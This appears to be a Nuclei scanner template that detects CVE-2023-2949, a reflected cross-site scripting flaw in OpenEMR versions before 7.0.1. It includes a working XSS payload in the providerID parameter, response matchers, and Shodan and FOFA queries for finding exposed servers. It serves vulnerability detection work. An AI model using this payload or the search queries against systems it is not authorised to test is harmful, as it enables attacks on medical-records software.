nuclei-templates/http/cves/2023/CVE-2023-2949.yaml

40 lines
1.4 KiB
YAML
Raw Normal View History

2024-04-23 13:22:45 +00:00
id: CVE-2023-2949
info:
name: OpenEMR < 7.0.1 - Cross-site Scripting
author: ritikchaddha,princechaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.
reference:
- https://huntr.com/bounties/3842486f-38b1-4150-9f78-b81d0ae580c4
- https://github.com/openemr/openemr/commit/af1ecf78d1342519791bda9d3079e88f7d859015
- https://nvd.nist.gov/vuln/detail/CVE-2023-2949
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2949
cwe-id: CWE-79
cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
metadata:
vendor: open-emr
product: openemr
fofa-query: app="OpenEMR"
shodan-query: http.favicon.hash:1971268439
2024-04-23 13:49:35 +00:00
verified: true
max-request: 1
2024-04-23 13:22:45 +00:00
tags: cve,cve2023,xss,openemr,open-emr
http:
- method: GET
path:
- "{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "<img src=x onerror=alert(document.domain);>", "openemr")'
condition: and
# digest: 4a0a004730450220108fa66c2cdc6c8b7680bd5104e88e717b840d2571b4c6ad031c039f4eb9ccd6022100b75192c2cd5ddb7e9874af2830784c6516ea54684cde65e41b82e565b835337a:922c64590222798bb761d5b6d8e72950